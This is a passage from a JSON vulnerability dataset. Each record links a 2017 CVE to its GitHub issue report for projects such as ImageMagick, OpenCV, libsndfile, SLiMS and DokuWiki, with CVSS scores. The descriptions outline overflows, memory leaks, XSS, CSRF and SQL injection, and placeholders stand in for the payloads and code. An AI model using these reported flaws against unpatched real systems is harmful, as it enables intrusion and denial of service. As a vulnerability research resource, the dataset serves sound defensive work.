  7441. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/138",
  7442. "Repo_new": "cn-uofbasel/ccn-lite",
  7443. "Issue_Created_At": "2017-08-07T18:43:58Z",
  7444. "description": "[ CVETAG ] ccnl ext mgmt.c Missing NULL pointer checks after APITAG which is defined to a libc APITAG Missing NULL pointer checks after APITAG which is defined to a libc APITAG src/ccnl ext mgmt.c: interfaceaddr = (char )ccnl_malloc(num_interfaces sizeof(char )); src/ccnl ext mgmt.c for(it NUMBERTAG it APITAG complen = (int ) ccnl_malloc(sizeof(int NUMBERTAG src/ccnl ext mgmt.c prefix_a >complen NUMBERTAG strlen(\"mgmt\"); src/ccnl ext mgmt.c: prefix_a >comp = (unsigned char ) ccnl_malloc(sizeof(unsigned char NUMBERTAG src/ccnl ext mgmt.c prefix_a >comp NUMBERTAG unsigned char )\"mgmt\"; src/ccnl ext nfnops.c: h = ccnl_malloc(sizeof(int)); src/ccnl ext nfnops.c h = i2 i1; src/ccnl ext nfnops.c: cp = APITAG src/ccnl ext nfnops.c strcpy(cp, pending); src/ccnl ext nfnkrivine.c: resolveterm = APITAG src/ccnl ext nfnkrivine.c sprintf(resolveterm, \"RESOLVENAME(%s)\", lambda_expr); src/ccnl ext nfnkrivine.c: int integer = ccnl_malloc(sizeof(int)); src/ccnl ext nfnkrivine.c integer = strtol((char )c >pkt >content NUMBERTAG src/ccnl core util.c: prefix >chunknum = (int ) ccnl_malloc(sizeof(int)); src/ccnl core util.c prefix >chunknum = chunknum; src/ccnl uapi.c: name = (char ) ccnl_malloc (sizeof(char) (strlen(d_obj >name NUMBERTAG src/ccnl uapi.c strncpy (name, d_obj >name, (strlen(d_obj >name NUMBERTAG because APITAG modifies the first arg ...etc, these are just _some_ examples",
  7445. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  7446. "severity": "CRITICAL",
  7447. "baseScore": 9.8,
  7448. "impactScore": 5.9,
  7449. "exploitabilityScore": 3.9
  7450. },
  7451. {
  7452. "CVE_ID": "CVE-2017-12473",
  7453. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/139",
  7454. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/139",
  7455. "Repo_new": "cn-uofbasel/ccn-lite",
  7456. "Issue_Created_At": "2017-08-07T18:45:07Z",
  7457. "description": "APITAG CVETAG ]: ccnl_ccntlv_bytes2pkt program crash. ccnl_ccntlv_bytes2pkt: this parsing is not safe for all input data needs more bound checks, as some packets with wrong L values can bring this to crash line NUMBERTAG and NUMBERTAG",
  7458. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  7459. "severity": "HIGH",
  7460. "baseScore": 7.5,
  7461. "impactScore": 3.6,
  7462. "exploitabilityScore": 3.9
  7463. },
  7464. {
  7465. "CVE_ID": "CVE-2017-12562",
  7466. "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/292",
  7467. "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/292",
  7468. "Repo_new": "libsndfile/libsndfile",
  7469. "Issue_Created_At": "2017-06-14T10:23:06Z",
  7470. "description": "Heap buffer overflows in APITAG in NUMBERTAG and later NUMBERTAG Case APITAG only enlarges the buffer by APITAG bytes instead of size bytes. This issue had originally reported by funute against openmpt NUMBERTAG see CVETAG ). openmpt NUMBERTAG uses libsndfile to write WAV files and can output large amounts of string data in the APITAG metadata field. Valgrind stacktrace (libsndfile NUMBERTAG ERRORTAG Test case in bug1.c (tested on Ubuntu NUMBERTAG with libsndfile NUMBERTAG ERRORTAG ERRORTAG NUMBERTAG APITAG in APITAG enlarges the header buffer (if needed) prior to the big switch statement by an amount NUMBERTAG bytes) which is enough for all cases where only a single value gets added. Cases APITAG , APITAG , APITAG however additionally write an arbitrary length block of data and again enlarge the buffer to the required amount. However, the required space calculation does not take into account the size of the length field which gets output before the data. Test case bug2.c (tested on Ubuntu NUMBERTAG with libsndfile NUMBERTAG with APITAG replaced by size in the buffer size calculation): ERRORTAG ERRORTAG NUMBERTAG Buffer size requirement calculation in case APITAG does not account for the padding byte ( APITAG happens after the calculation which uses size NUMBERTAG Case APITAG can overrun the header buffer by NUMBERTAG byte when no padding is involved ( APITAG while the buffer is only guaranteed to have size space available NUMBERTAG APITAG in case APITAG always writes NUMBERTAG byte beyond the space which is guaranteed to be allocated in the header buffer NUMBERTAG Case APITAG can overrun the provided source string by NUMBERTAG byte if padding is envolved ( APITAG where size is APITAG (which includes the NUMBERTAG terminator, plus optionally another APITAG which is padding and not guaranteed to be readable via the source string pointer). I have not yet invested the time to provide reproducable tests for NUMBERTAG to NUMBERTAG require hitting the header buffer end exactly which might not even be possible with NUMBERTAG byte alignment and the buffer enlargment being also NUMBERTAG byte aligned (I did not investigate this further, triggering might require an odd APITAG constant and/or a growing factor other than APITAG ). I would consider the current code to at least be fragile nonetheless NUMBERTAG is difficult to even catch with valgrind or similar tools because the source strings are layed out in one big buffer contiguously ( APITAG ) which makes it impossible for memory checkers to detect buffer overruns inside that buffer. Pull request with fixes will follow.",
  7471. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  7472. "severity": "CRITICAL",
  7473. "baseScore": 9.8,
  7474. "impactScore": 5.9,
  7475. "exploitabilityScore": 3.9
  7476. },
  7477. {
  7478. "CVE_ID": "CVE-2017-12563",
  7479. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/599",
  7480. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/599",
  7481. "Repo_new": "imagemagick/imagemagick",
  7482. "Issue_Created_At": "2017-07-23T13:57:14Z",
  7483. "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify PSD file , imagemagick will allocate memory to store the data, here is the critical code: psd.c , in function APITAG ERRORTAG length can be read from image,that is to say it can be controlled by input file. APITAG Here is my FILETAG to limit memory usage,but NUMBERTAG MB limit can be bypassed. APITAG testcase: URLTAG Credit : APITAG of Venustech",
  7484. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7485. "severity": "MEDIUM",
  7486. "baseScore": 6.5,
  7487. "impactScore": 3.6,
  7488. "exploitabilityScore": 2.8
  7489. },
  7490. {
  7491. "CVE_ID": "CVE-2017-12564",
  7492. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/601",
  7493. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/601",
  7494. "Repo_new": "imagemagick/imagemagick",
  7495. "Issue_Created_At": "2017-07-23T14:01:17Z",
  7496. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase : FILETAG Credit : APITAG of Venustech",
  7497. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7498. "severity": "MEDIUM",
  7499. "baseScore": 6.5,
  7500. "impactScore": 3.6,
  7501. "exploitabilityScore": 2.8
  7502. },
  7503. {
  7504. "CVE_ID": "CVE-2017-12565",
  7505. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/602",
  7506. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/602",
  7507. "Repo_new": "imagemagick/imagemagick",
  7508. "Issue_Created_At": "2017-07-23T14:03:16Z",
  7509. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase : FILETAG Credit : APITAG of Venustech",
  7510. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7511. "severity": "MEDIUM",
  7512. "baseScore": 6.5,
  7513. "impactScore": 3.6,
  7514. "exploitabilityScore": 2.8
  7515. },
  7516. {
  7517. "CVE_ID": "CVE-2017-12566",
  7518. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/603",
  7519. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/603",
  7520. "Repo_new": "imagemagick/imagemagick",
  7521. "Issue_Created_At": "2017-07-23T14:04:38Z",
  7522. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase : FILETAG Credit : APITAG of Venustech",
  7523. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7524. "severity": "MEDIUM",
  7525. "baseScore": 6.5,
  7526. "impactScore": 3.6,
  7527. "exploitabilityScore": 2.8
  7528. },
  7529. {
  7530. "CVE_ID": "CVE-2017-12583",
  7531. "Issue_Url_old": "https://github.com/splitbrain/dokuwiki/issues/2061",
  7532. "Issue_Url_new": "https://github.com/dokuwiki/dokuwiki/issues/2061",
  7533. "Repo_new": "dokuwiki/dokuwiki",
  7534. "Issue_Created_At": "2017-08-01T04:15:21Z",
  7535. "description": "APITAG Refected XSS in FILETAG . Bug Field at is not sanitized in msg error message. It's a reflected XSS. Detail APITAG ERRORTAG APITAG APITAG",
  7536. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  7537. "severity": "MEDIUM",
  7538. "baseScore": 6.1,
  7539. "impactScore": 2.7,
  7540. "exploitabilityScore": 2.8
  7541. },
  7542. {
  7543. "CVE_ID": "CVE-2017-12584",
  7544. "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/49",
  7545. "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/49",
  7546. "Repo_new": "slims/slims8_akasia",
  7547. "Issue_Created_At": "2017-05-26T12:26:07Z",
  7548. "description": "Security Bugs] CSRF + XSS in Change User Profile. In Change User Profile function, there is no Old password to confirm change user password, and also no CSRF Token to protect CSRF malicious request. APITAG Owasp URLTAG . So when the admin user access to malicious web, it will trigger to automatically change admin password to attacker's password. Example request: URLTAG CODETAG This will change admin password to trichimtrich And also, there is a stored XSS in here too. All the field APITAG , APITAG , APITAG have the same problem. Sample request: APITAG APITAG APITAG APITAG Attacker can trigger admin to execute abitrary javascript to do anything.",
  7549. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7550. "severity": "HIGH",
  7551. "baseScore": 8.8,
  7552. "impactScore": 5.9,
  7553. "exploitabilityScore": 2.8
  7554. },
  7555. {
  7556. "CVE_ID": "CVE-2017-12585",
  7557. "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/47",
  7558. "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/47",
  7559. "Repo_new": "slims/slims8_akasia",
  7560. "Issue_Created_At": "2017-05-25T20:01:39Z",
  7561. "description": "FILETAG So if my POST variable APITAG will trigger sql injection if not contains these chars. Example: ERRORTAG FILETAG And also CODETAG Variable APITAG does not sanitize for sql query yet. So it'll trigger injection like this FILETAG These NUMBERTAG urls have the same problems FILETAG FILETAG This bug is excutable by everyone who has librarian role (single).",
  7562. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  7563. "severity": "HIGH",
  7564. "baseScore": 8.8,
  7565. "impactScore": 5.9,
  7566. "exploitabilityScore": 2.8
  7567. },
  7568. {
  7569. "CVE_ID": "CVE-2017-12586",
  7570. "Issue_Url_old": "https://github.com/slims/slims8_akasia/issues/48",
  7571. "Issue_Url_new": "https://github.com/slims/slims8_akasia/issues/48",
  7572. "Repo_new": "slims/slims8_akasia",
  7573. "Issue_Created_At": "2017-05-25T20:06:38Z",
  7574. "description": "FILETAG",
  7575. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  7576. "severity": "MEDIUM",
  7577. "baseScore": 6.5,
  7578. "impactScore": 3.6,
  7579. "exploitabilityScore": 2.8
  7580. },
  7581. {
  7582. "CVE_ID": "CVE-2017-12587",
  7583. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/535",
  7584. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/535",
  7585. "Repo_new": "imagemagick/imagemagick",
  7586. "Issue_Created_At": "2017-07-04T13:45:58Z",
  7587. "description": "CPU exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE Here is the critical code CODETAG magick[...] is from APITAG ERRORTAG magick[x] can be large as NUMBERTAG ff: ERRORTAG So 'filesize' can be large as NUMBERTAG UL NUMBERTAG w, the loop in the above will be large. On the other handle, APITAG in the loop has no success_status checking, so a crafted file will cause a larget of failed I/O in the loop. testcase: URLTAG Credit: APITAG of Venustech",
  7588. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7589. "severity": "HIGH",
  7590. "baseScore": 8.8,
  7591. "impactScore": 5.9,
  7592. "exploitabilityScore": 2.8
  7593. },
  7594. {
  7595. "CVE_ID": "CVE-2017-12595",
  7596. "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/146",
  7597. "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/146",
  7598. "Repo_new": "qpdf/qpdf",
  7599. "Issue_Created_At": "2017-08-22T11:31:11Z",
  7600. "description": "QPDF NUMBERTAG Stack Corruption. APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG WARNING: APITAG file is damaged WARNING: APITAG can't find startxref WARNING: APITAG Attempting to reconstruct cross reference table Program received signal SIGSEGV, Segmentation fault NUMBERTAG ffff7b NUMBERTAG in APITAG APITAG std::char_traits APITAG , std::allocator APITAG > const&, APITAG bool&, APITAG , QPDF , bool, bool, bool) () from PATHTAG (gdb) exploitable Description: Possible stack corruption Short description: APITAG NUMBERTAG Hash: APITAG Exploitability Classification: EXPLOITABLE Explanation: GDB generated an error while unwinding the stack and/or the stack contained return addresses that were not mapped in the inferior's process address space and/or the stack pointer is pointing to a location outside the default stack region. These conditions likely indicate stack corruption, which is generally considered exploitable. Other tags: APITAG NUMBERTAG APITAG NUMBERTAG",
  7601. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7602. "severity": "HIGH",
  7603. "baseScore": 7.8,
  7604. "impactScore": 5.9,
  7605. "exploitabilityScore": 1.8
  7606. },
  7607. {
  7608. "CVE_ID": "CVE-2017-12596",
  7609. "Issue_Url_old": "https://github.com/openexr/openexr/issues/238",
  7610. "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/238",
  7611. "Repo_new": "academysoftwarefoundation/openexr",
  7612. "Issue_Created_At": "2017-07-29T06:35:23Z",
  7613. "description": "heap based buffer overflow in exrmaketiled . A heap based buffer overflow occurs when we test exrmaketiled with the latest code of this repo. The details of the bug as follows: $ ./exrmaketiled PATHTAG /tmp/out APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG c7fe at pc NUMBERTAG fc NUMBERTAG e NUMBERTAG a5ab bp NUMBERTAG ffe NUMBERTAG e7e0 sp NUMBERTAG ffe NUMBERTAG e7d8 READ of size NUMBERTAG at NUMBERTAG c7fe thread T NUMBERTAG fc NUMBERTAG e NUMBERTAG a5aa in APITAG PATHTAG NUMBERTAG fc NUMBERTAG e NUMBERTAG a5aa in APITAG const , int, unsigned short , int) PATHTAG NUMBERTAG fc NUMBERTAG e NUMBERTAG ca7 in APITAG const , int, APITAG >, char const &) PATHTAG NUMBERTAG fc NUMBERTAG e NUMBERTAG in APITAG const , int, int, char const &) PATHTAG NUMBERTAG fc NUMBERTAG ea NUMBERTAG bb7 in execute PATHTAG NUMBERTAG fc NUMBERTAG d NUMBERTAG ea in APITAG ) PATHTAG NUMBERTAG fc NUMBERTAG ea7c NUMBERTAG in APITAG int) PATHTAG NUMBERTAG fc NUMBERTAG e NUMBERTAG c7c in APITAG int) PATHTAG NUMBERTAG ed in APITAG const , char const , int, APITAG APITAG APITAG int, int, std::set<std::string, std::less APITAG , std::allocator APITAG > const&, Extrapolation, Extrapolation, bool) PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG fc NUMBERTAG dd NUMBERTAG f NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG c ( PATHTAG NUMBERTAG c7fe is located NUMBERTAG bytes to the left of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG fc NUMBERTAG f NUMBERTAG a NUMBERTAG f in operator APITAG long) ( PATHTAG NUMBERTAG fc NUMBERTAG e NUMBERTAG adf0 in APITAG const&, unsigned long, unsigned long) PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG ffff8a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG ffff8b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG ffff8c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG ffff8d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG ffff8e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG ffff8f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa NUMBERTAG c NUMBERTAG ffff NUMBERTAG c NUMBERTAG ffff NUMBERTAG c NUMBERTAG ffff NUMBERTAG c NUMBERTAG ffff NUMBERTAG c NUMBERTAG ffff NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc APITAG internal: fe NUMBERTAG ABORTING And you could get the testcase and more details: URLTAG FILETAG",
  7614. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7615. "severity": "HIGH",
  7616. "baseScore": 7.8,
  7617. "impactScore": 5.9,
  7618. "exploitabilityScore": 1.8
  7619. },
  7620. {
  7621. "CVE_ID": "CVE-2017-12597",
  7622. "Issue_Url_old": "https://github.com/opencv/opencv/issues/9309",
  7623. "Issue_Url_new": "https://github.com/opencv/opencv/issues/9309",
  7624. "Repo_new": "opencv/opencv",
  7625. "Issue_Created_At": "2017-08-04T09:29:14Z",
  7626. "description": "Some bugs result to crashes when in imread of opencv (include heap overflow and out of bound write). APITAG Some crashes are found in opencv when a malformed image file read by calling \"cv::imread\" function. Openc NUMBERTAG and the latest commit are tested, but it seems that the bugs also impacts Openc NUMBERTAG The bugs which result to \"segment fault\" are including heap overflow and out of bound write, which may be potential security threat. System information (version) APITAG NUMBERTAG Operating System / Platform => Windows NUMBERTAG Bit Compiler => Visual Studio NUMBERTAG APITAG NUMBERTAG Operating System / Platform => Linux Compiler => gcc Detailed description Some details are as follows: APITAG details and testcases refer to : FILETAG ================== An out of bound write error occurs when reads it by using cv::imread. ERRORTAG NUMBERTAG A heap based buf overflow results to invalid write ERRORTAG Steps to reproduce just call the cv::imread to read the specified testcase. Please refer to the following url for the testcases: testcases URLTAG URLTAG",
  7627. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7628. "severity": "HIGH",
  7629. "baseScore": 8.8,
  7630. "impactScore": 5.9,
  7631. "exploitabilityScore": 2.8
  7632. },
  7633. {
  7634. "CVE_ID": "CVE-2017-12600",
  7635. "Issue_Url_old": "https://github.com/opencv/opencv/issues/9311",
  7636. "Issue_Url_new": "https://github.com/opencv/opencv/issues/9311",
  7637. "Repo_new": "opencv/opencv",
  7638. "Issue_Created_At": "2017-08-04T10:12:30Z",
  7639. "description": "Two DOS bugs of opencv. APITAG Two DOS bugs are reported, one exhausts cpu for a long time and the other exhausts memory at mean while. System information (version) APITAG NUMBERTAG Operating System / Platform => Linu NUMBERTAG Bit Compiler => Gcc > APITAG NUMBERTAG Operating System / Platform => Linux Compiler => Gcc Detailed description Please see the bug NUMBERTAG and bug NUMBERTAG for the details in the following url: FILETAG and testcases in testcases URLTAG URLTAG",
  7640. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  7641. "severity": "HIGH",
  7642. "baseScore": 7.5,
  7643. "impactScore": 3.6,
  7644. "exploitabilityScore": 3.9
  7645. },
  7646. {
  7647. "CVE_ID": "CVE-2017-12640",
  7648. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/542",
  7649. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/542",
  7650. "Repo_new": "imagemagick/imagemagick",
  7651. "Issue_Created_At": "2017-07-05T02:32:19Z",
  7652. "description": "heap buffer overflow in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE Here is the critical code ERRORTAG So a crafted file will cause x_off[i] out of bound operation vulnerability. testcase: URLTAG Credit: APITAG of Venustech",
  7653. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7654. "severity": "HIGH",
  7655. "baseScore": 8.8,
  7656. "impactScore": 5.9,
  7657. "exploitabilityScore": 2.8
  7658. },
  7659. {
  7660. "CVE_ID": "CVE-2017-12641",
  7661. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/550",
  7662. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/550",
  7663. "Repo_new": "imagemagick/imagemagick",
  7664. "Issue_Created_At": "2017-07-08T13:35:29Z",
  7665. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG testcase: URLTAG Credit : APITAG of Venustech",
  7666. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7667. "severity": "HIGH",
  7668. "baseScore": 8.8,
  7669. "impactScore": 5.9,
  7670. "exploitabilityScore": 2.8
  7671. },
  7672. {
  7673. "CVE_ID": "CVE-2017-12642",
  7674. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/552",
  7675. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/552",
  7676. "Repo_new": "imagemagick/imagemagick",
  7677. "Issue_Created_At": "2017-07-09T01:39:20Z",
  7678. "description": "memory leak in APITAG . Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG testcase: URLTAG Credit : APITAG of Venustech",
  7679. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7680. "severity": "HIGH",
  7681. "baseScore": 8.8,
  7682. "impactScore": 5.9,
  7683. "exploitabilityScore": 2.8
  7684. },
  7685. {
  7686. "CVE_ID": "CVE-2017-12643",
  7687. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/549",
  7688. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/549",
  7689. "Repo_new": "imagemagick/imagemagick",
  7690. "Issue_Created_At": "2017-07-08T09:08:24Z",
  7691. "description": "memory exhaustion in APITAG in png.c. Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify JNG file that contains chunk data, imagemagick will allocate memory to store the chunk data in function APITAG Here is the critical code: ERRORTAG length can be controlled as follow: ERRORTAG So the only limitation is it must smaller than PNG_UINT NUMBERTAG MAX, it is still very large. Also when chunk type is JDAT, it will write chunk data to file as follow: ERRORTAG So a crafted jng file can cause memory exhausted and large I/O. testcase: URLTAG Credit: APITAG of Venustech",
  7692. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7693. "severity": "MEDIUM",
  7694. "baseScore": 6.5,
  7695. "impactScore": 3.6,
  7696. "exploitabilityScore": 2.8
  7697. },
  7698. {
  7699. "CVE_ID": "CVE-2017-12644",
  7700. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/551",
  7701. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/551",
  7702. "Repo_new": "imagemagick/imagemagick",
  7703. "Issue_Created_At": "2017-07-09T01:35:51Z",
  7704. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG testcase: URLTAG Credit : APITAG of Venustech",
  7705. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7706. "severity": "HIGH",
  7707. "baseScore": 8.8,
  7708. "impactScore": 5.9,
  7709. "exploitabilityScore": 2.8
  7710. },
  7711. {
  7712. "CVE_ID": "CVE-2017-12654",
  7713. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/620",
  7714. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/620",
  7715. "Repo_new": "imagemagick/imagemagick",
  7716. "Issue_Created_At": "2017-07-25T11:13:37Z",
  7717. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG A memory leak vulnerability was found in function APITAG ,which allow attackers to cause a denial of service (memory leak) via a crafted file. ERRORTAG testcase: FILETAG APITAG of Venustech",
  7718. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7719. "severity": "MEDIUM",
  7720. "baseScore": 6.5,
  7721. "impactScore": 3.6,
  7722. "exploitabilityScore": 2.8
  7723. },
  7724. {
  7725. "CVE_ID": "CVE-2017-12662",
  7726. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/576",
  7727. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/576",
  7728. "Repo_new": "imagemagick/imagemagick",
  7729. "Issue_Created_At": "2017-07-17T01:34:17Z",
  7730. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG POC: URLTAG Credit : APITAG of Venustech",
  7731. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7732. "severity": "HIGH",
  7733. "baseScore": 8.8,
  7734. "impactScore": 5.9,
  7735. "exploitabilityScore": 2.8
  7736. },
  7737. {
  7738. "CVE_ID": "CVE-2017-12663",
  7739. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/573",
  7740. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/573",
  7741. "Repo_new": "imagemagick/imagemagick",
  7742. "Issue_Created_At": "2017-07-17T01:21:03Z",
  7743. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG POC: URLTAG Credit : APITAG of Venustech",
  7744. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7745. "severity": "HIGH",
  7746. "baseScore": 8.8,
  7747. "impactScore": 5.9,
  7748. "exploitabilityScore": 2.8
  7749. },
  7750. {
  7751. "CVE_ID": "CVE-2017-12664",
  7752. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/574",
  7753. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/574",
  7754. "Repo_new": "imagemagick/imagemagick",
  7755. "Issue_Created_At": "2017-07-17T01:25:28Z",
  7756. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG POC: URLTAG Credit : APITAG of Venustech",
  7757. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7758. "severity": "HIGH",
  7759. "baseScore": 8.8,
  7760. "impactScore": 5.9,
  7761. "exploitabilityScore": 2.8
  7762. },
  7763. {
  7764. "CVE_ID": "CVE-2017-12665",
  7765. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/577",
  7766. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/577",
  7767. "Repo_new": "imagemagick/imagemagick",
  7768. "Issue_Created_At": "2017-07-17T01:38:06Z",
  7769. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG POC: URLTAG Credit : APITAG of Venustech",
  7770. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7771. "severity": "HIGH",
  7772. "baseScore": 8.8,
  7773. "impactScore": 5.9,
  7774. "exploitabilityScore": 2.8
  7775. },
  7776. {
  7777. "CVE_ID": "CVE-2017-12666",
  7778. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/572",
  7779. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/572",
  7780. "Repo_new": "imagemagick/imagemagick",
  7781. "Issue_Created_At": "2017-07-17T00:39:44Z",
  7782. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG POC: URLTAG Credit : APITAG of Venustech",
  7783. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7784. "severity": "HIGH",
  7785. "baseScore": 8.8,
  7786. "impactScore": 5.9,
  7787. "exploitabilityScore": 2.8
  7788. },
  7789. {
  7790. "CVE_ID": "CVE-2017-12667",
  7791. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/553",
  7792. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/553",
  7793. "Repo_new": "imagemagick/imagemagick",
  7794. "Issue_Created_At": "2017-07-09T01:50:39Z",
  7795. "description": "memory leak in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG ERRORTAG testcase: URLTAG Credit : APITAG of Venustech",
